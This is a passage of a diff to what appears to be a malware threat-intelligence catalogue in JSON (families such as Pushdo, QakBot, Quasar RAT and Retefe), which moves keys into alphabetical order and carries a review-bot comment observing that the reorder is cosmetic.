+ "description": "Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies.",
  "meta": {
- "synonyms": [
- "PSS"
- ],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.pss",
  "https://citizenlab.ca/2017/12/champing-cyberbit-ethiopian-dissidents-targeted-commercial-spyware/"
- ]
+ ],
+ "synonyms": [
+ "PSS"
+ ],
+ "type": []
  },
  "uuid": "e437f01c-8040-4098-a3fa-20154b58c928",
- "value": "PC Surveillance System",
- "description": "Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies."
+ "value": "PC Surveillance System"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon",
  "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "d5138738-846e-4466-830c-cd2bb6ad09cf",
- "value": "Pteranodon",
- "description": ""
+ "value": "Pteranodon"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.pubnubrat",
  "http://blog.alyac.co.kr/1853",
  "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "bcc8e3ef-fc5e-4d44-9011-4d429bac0f26",
- "value": "PubNubRAT",
- "description": ""
+ "value": "PubNubRAT"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.punkey_pos",
  "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-POS-Malware-Emerges---Punkey/",
  "https://www.pandasecurity.com/mediacenter/malware/punkeypos/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "57a6dbce-2d8a-44ae-a561-282d02935698",
- "value": "Punkey POS",
- "description": ""
+ "value": "Punkey POS"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy",
  "https://github.com/n1nj4sec/pupy",
  "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/",
  "https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/",
  "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "8a789016-5f8d-4cd9-ba96-ba253db42fd8",
- "value": "pupy",
- "description": ""
+ "value": "pupy"
  },
  {
+ "description": "Pushdo is usually classified as a \"downloader\" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan.",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo",
  "https://www.secureworks.com/research/pushdo",
  "https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf",
  "http://malware-traffic-analysis.net/2017/04/03/index2.html",
  "https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "b39ffc73-db5f-4a8a-acd2-bee958d69155",
- "value": "Pushdo",
- "description": "Pushdo is usually classified as a \"downloader\" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan."
+ "value": "Pushdo"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.putabmow"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "b0cb81bc-5d97-454a-8eee-4e81328c7228",
- "value": "Putabmow",
- "description": ""
+ "value": "Putabmow"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.pvzout",
  "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "52932caa-2fac-4eeb-88de-b3e143db010e",
- "value": "PvzOut",
- "description": ""
+ "value": "PvzOut"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwnpos",
  "https://blog.trendmicro.com/trendlabs-security-intelligence/pwnpos-old-undetected-pos-malware-still-causing-havoc/",
  "https://www.brimorlabsblog.com/2015/03/and-you-get-pos-malware-nameand-you-get.html",
  "https://twitter.com/physicaldrive0/status/573109512145649664"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "c903627c-90f6-44ee-9750-4bb44bdbceab",
- "value": "pwnpos",
- "description": ""
+ "value": "pwnpos"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa",
  "https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/",
  "https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/",
  "https://www.youtube.com/watch?v=HfSQlC76_s4"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "3f0e7db1-5944-4137-89d1-d36940f596d2",
- "value": "Pykspa",
- "description": ""
+ "value": "Pykspa"
  },
  {
+ "description": "PyLocky is a ransomware that tries to pass off as Locky in its ransom note. It is written in Python and packaged with PyInstaller.",
  "meta": {
- "synonyms": [
- "Locky Locker"
- ],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.pylocky",
  "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/",
  "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/",
  "https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/"
- ]
+ ],
+ "synonyms": [
+ "Locky Locker"
+ ],
+ "type": []
  },
  "uuid": "3a5775d3-7d4a-4795-b1b1-7a340030d490",
- "value": "PyLocky",
- "description": "PyLocky is a ransomware that tries to pass off as Locky in its ransom note. It is written in Python and packaged with PyInstaller."
+ "value": "PyLocky"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.qaccel"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "f4980a75-f72c-4925-8ff5-118b32dd5eaa",
- "value": "Qaccel",
- "description": ""
+ "value": "Qaccel"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars",
  "https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan",
@@ -11537,19 +11539,16 @@
  "https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/",
  "https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/",
  "https://pages.phishlabs.com/rs/130-BFB-942/images/Qadars%20-%20Final.pdf"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "080b2071-2d69-4b76-962e-3d0142074bcb",
- "value": "Qadars",
- "description": ""
+ "value": "Qadars"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [
- "Qbot",
- "Pinkslipbot"
- ],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot",
  "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/",
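Review bot: Every new-side line of this hunk only relocates keys that already existed — `"description"` to the top of each entry and `"synonyms"`/`"type"` after `"refs"` — which looks like an alphabetical key sort, and the same applies to the hunks `@@ -11560,45`, `@@ -11606,16`, `@@ -11628,84`, `@@ -11715,214`, `@@ -11931,69` and `@@ -12004,221`. JSON key order carries no meaning, so the reorder is cosmetic; naming the tool or script that produced it in the commit description would tell reviewers the data itself is unchanged and let the repository's validation step enforce that order so the churn does not recur. The moved `"description": ""` lines keep an empty string as the "no description" value on every such entry; if the galaxy schema allows it, omitting the key (or choosing one policy and applying it throughout) would distinguish a missing description from a blank one.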
@@ -11560,45 +11559,48 @@
  "http://contagiodump.blogspot.com/2010/11/template.html",
  "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf",
  "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html"
- ]
+ ],
+ "synonyms": [
+ "Qbot",
+ "Pinkslipbot"
+ ],
+ "type": []
  },
  "uuid": "2ccaccd0-8362-4224-8497-2012e7cc7549",
- "value": "QakBot",
- "description": ""
+ "value": "QakBot"
  },
  {
+ "description": "",
  "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost"
+ ],
  "synonyms": [
  "Tolouge"
  ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost"
- ]
+ "type": []
  },
  "uuid": "28f35535-dd40-4ee2-8064-5acbe76d8d4c",
- "value": "QHost",
- "description": ""
+ "value": "QHost"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [
- "qtproject"
- ],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.qtbot",
  "https://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/"
- ]
+ ],
+ "synonyms": [
+ "qtproject"
+ ],
+ "type": []
  },
  "uuid": "e8240391-3e3d-4894-ba80-f8e8de8a8222",
- "value": "QtBot",
- "description": ""
+ "value": "QtBot"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.quant_loader",
  "https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/",
@@ -11606,16 +11608,16 @@
  "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/",
  "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat",
  "https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "e6005ce5-3e3d-4dfb-8de7-3da45e89e549",
- "value": "Quant Loader",
- "description": ""
+ "value": "Quant Loader"
  },
  {
+ "description": "Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat",
  "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/",
@@ -11628,84 +11630,82 @@
  "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/",
  "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/",
  "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "05252643-093b-4070-b62f-d5836683a9fa",
- "value": "Quasar RAT",
- "description": "Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult."
+ "value": "Quasar RAT"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.r980",
  "https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "06f63e6b-d177-4e21-b432-e3a219bc0965",
- "value": "r980",
- "description": ""
+ "value": "r980"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant",
  "https://www.cyphort.com/radamant-ransomware-distributed-via-rig-ek/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "98bcb2b9-bc3a-4ffb-859a-94bd03c1cc3c",
- "value": "Radamant",
- "description": ""
+ "value": "Radamant"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.radrat",
  "https://labs.bitdefender.com/2018/04/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "271752e3-67ca-48bc-ade2-30eec11defca",
- "value": "RadRAT",
- "description": ""
+ "value": "RadRAT"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [
- "brebsd"
- ],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo",
  "https://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor"
- ]
+ ],
+ "synonyms": [
+ "brebsd"
+ ],
+ "type": []
  },
  "uuid": "805b99d1-233d-4f7f-b343-440e5d507494",
- "value": "Rambo",
- "description": ""
+ "value": "Rambo"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramdo"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "51f53823-d289-4176-af45-3fca7eda824b",
- "value": "Ramdo",
- "description": ""
+ "value": "Ramdo"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [
- "Nimnul"
- ],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit",
  "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/",
@@ -11715,214 +11715,216 @@
  "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html",
  "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html",
  "https://research.checkpoint.com/ramnits-network-proxy-servers/"
- ]
+ ],
+ "synonyms": [
+ "Nimnul"
+ ],
+ "type": []
  },
  "uuid": "542161c0-47a4-4297-baca-5ed98386d228",
- "value": "Ramnit",
- "description": ""
+ "value": "Ramnit"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus",
  "https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/",
  "http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html",
  "https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/",
  "https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "5d9a27e7-3110-470a-ac0d-2bf00cac7846",
- "value": "Ranbyus",
- "description": ""
+ "value": "Ranbyus"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranscam",
  "http://blog.talosintel.com/2016/07/ranscam.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "50c92b0b-cae3-41e7-b7d8-dffc2c88ac4b",
- "value": "Ranscam",
- "description": ""
+ "value": "Ranscam"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransoc",
  "https://www.proofpoint.com/us/threat-insight/post/ransoc-desktop-locking-ransomware-ransacks-local-files-social-media-profiles"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "5310903e-0704-4ca4-ab1b-52d243dddb06",
- "value": "Ransoc",
- "description": ""
+ "value": "Ransoc"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [
- "WinLock"
- ],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomlock",
  "https://www.symantec.com/security_response/writeup.jsp?docid=2012-022215-2340-99&tabid=2",
  "https://forum.malekal.com/viewtopic.php?t=36485&start="
- ]
+ ],
+ "synonyms": [
+ "WinLock"
+ ],
+ "type": []
  },
  "uuid": "3e47c926-eea3-4fba-915a-1f3c5b92a94c",
- "value": "Ransomlock",
- "description": ""
+ "value": "Ransomlock"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom",
  "https://twitter.com/malwrhunterteam/status/977275481765613569",
  "https://twitter.com/malwrhunterteam/status/997748495888076800"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "06929ad3-2a00-4212-b171-9ecb5f956af5",
- "value": "Rapid Ransom",
- "description": ""
+ "value": "Rapid Ransom"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_stealer",
  "http://pwc.blogs.com/cyber_security_updates/2014/09/malware-microevolution.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "bc1fc21d-80c0-4629-bb18-d5ae1df2a431",
- "value": "RapidStealer",
- "description": ""
+ "value": "RapidStealer"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar",
  "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "e0a1407f-2595-4bd2-ba16-2c6d9be4e066",
- "value": "rarstar",
- "description": ""
+ "value": "rarstar"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratabankapos",
  "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf",
  "http://blog.trex.re.kr/3"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "15b85bac-c58b-41fd-8332-cfac7c445e0d",
- "value": "RatabankaPOS",
- "description": ""
+ "value": "RatabankaPOS"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos",
  "https://threatvector.cylance.com/en_us/home/rawpos-malware.html",
  "http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "80f87001-ff40-4e33-bd12-12ed1a92d1d7",
- "value": "RawPOS",
- "description": ""
+ "value": "RawPOS"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [
- "Remote Control System",
- "Crisis"
- ],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs",
  "https://www.f-secure.com/documents/996508/1030745/callisto-group",
  "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/"
- ]
+ ],
+ "synonyms": [
+ "Remote Control System",
+ "Crisis"
+ ],
+ "type": []
  },
  "uuid": "c359c74e-4155-4e66-a344-b56947f75119",
- "value": "RCS",
- "description": ""
+ "value": "RCS"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.rdasrv",
  "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "1bf3469a-b9c8-497a-bcbb-b1095386706a",
- "value": "rdasrv",
- "description": ""
+ "value": "rdasrv"
  },
  {
+ "description": "Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot.",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot",
  "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html",
  "http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html",
  "http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/",
  "https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "9d58d94f-6885-4a38-b086-b9978ac62c1f",
- "value": "ReactorBot",
- "description": "Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot."
+ "value": "ReactorBot"
  },
  {
+ "description": "Reaver is a type of malware discovered by researchers at Palo Alto Networks in November 2017, but its activity dates back to at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants, noted as versions 1, 2, and 3. The malware is unique as its final payload masquerades as a control panel link (CPL) file. The intended targets of this activity are unknown as of this writing; however, it was used concurrently with the SunOrcal malware and the same C2 infrastructure used by threat actors who primarily target based on the \"Five Poisons\" - five perceived threats deemed dangerous to, and working against the interests of, the Chinese government.",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver",
  "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "826c31ca-2617-47e4-b236-205da3881182",
- "value": "Reaver",
- "description": "Reaver is a type of malware discovered by researchers at Palo Alto Networks in November 2017, but its activity dates back to at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants, noted as versions 1, 2, and 3. The malware is unique as its final payload masquerades as a control panel link (CPL) file. The intended targets of this activity are unknown as of this writing; however, it was used concurrently with the SunOrcal malware and the same C2 infrastructure used by threat actors who primarily target based on the \"Five Poisons\" - five perceived threats deemed dangerous to, and working against the interests of, the Chinese government."
+ "value": "Reaver"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.redalpha",
  "https://www.recordedfuture.com/redalpha-cyber-campaigns/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "6be9eee4-ee99-4ad6-bee3-2365d7b37a88",
- "value": "RedAlpha",
- "description": ""
+ "value": "RedAlpha"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves",
  "http://blog.macnica.net/blog/2017/12/post-8c22.html",
@@ -11931,69 +11933,69 @@
  "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
  "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves",
  "https://www.jpcert.or.jp/magazine/acreport-redleaves.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "a70e93a7-3578-47e1-9926-0818979ed866",
- "value": "RedLeaves",
- "description": ""
+ "value": "RedLeaves"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_alert",
  "https://twitter.com/JaromirHorejsi/status/816237293073797121"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "cd5f5165-7bd3-4430-b0bc-2c8fa518f618",
- "value": "Red Alert",
- "description": ""
+ "value": "Red Alert"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_gambler",
  "http://image.ahnlab.com/file_upload/asecissue_files/ASEC%20REPORT_vol.91.pdf"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "ca8ed7c0-f40b-4c0e-9dc4-52d6e0da41a7",
- "value": "Red Gambler",
- "description": ""
+ "value": "Red Gambler"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.regeorg",
  "https://sensepost.com/discover/tools/reGeorg/",
  "https://github.com/sensepost/reGeorg"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "9ee0eb87-7648-4581-b301-7472a48946ad",
- "value": "reGeorg",
- "description": ""
+ "value": "reGeorg"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.regin",
  "https://www.youtube.com/watch?v=jeLd-gw2bWo"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "4cbe9373-6b5e-42d0-9750-e0b7fc0d58bb",
- "value": "Regin",
- "description": ""
+ "value": "Regin"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos",
  "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html",
@@ -12004,221 +12006,221 @@
  "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/",
  "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/",
  "https://secrary.com/ReversingMalware/RemcosRAT/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "2894aee2-e0ec-417a-811e-74a68ab967b2",
- "value": "Remcos",
- "description": ""
+ "value": "Remcos"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi",
  "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf",
  "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "d39486af-c056-4bbf-aa1d-86fb5ef90ada",
- "value": "Remexi",
- "description": ""
+ "value": "Remexi"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider",
  "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "6a3c3fbc-97ec-4938-b64e-2679e4b73db9",
- "value": "Remsec",
- "description": ""
+ "value": "Remsec"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "b2b93651-cf64-47f5-a54f-799b919c592c",
- "value": "Remy",
- "description": ""
+ "value": "Remy"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.rerdom",
  "https://www.coresecurity.com/sites/default/files/resources/2017/03/Behind_Malware_Infection_Chain.pdf"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "a1f137d4-298f-4761-935d-bd39ab898479",
- "value": "Rerdom",
- "description": ""
+ "value": "Rerdom"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.retadup",
  "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "42fa55e3-e708-4c11-b807-f31573639941",
- "value": "Retadup",
- "description": ""
+ "value": "Retadup"
  },
  {
+ "description": "Retefe is a Windows Banking Trojan that can also download and install additional malware onto the system using Windows PowerShell. It's primary functionality is to assist the attacker with stealing credentials for online banking websites. It is typically targeted against Swiss banks. The malware binary itself is primarily a dropper component for a Javascript file which builds a VBA file which in turn loads multiple tools onto the host including: 7zip and TOR. The VBA installs a new root certificate and then forwards all traffic via TOR to the attacker controlled host in order to effectively MITM TLS traffic.",
  "meta": {
- "synonyms": [
- "Tsukuba",
- "Werdlod"
- ],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe",
  "https://www.govcert.admin.ch/blog/33/the-retefe-saga",
  "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/",
  "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/",
  "https://github.com/cocaman/retefe"
- ]
+ ],
+ "synonyms": [
+ "Tsukuba",
+ "Werdlod"
+ ],
+ "type": []
  },
  "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777",
- "value": "Retefe",
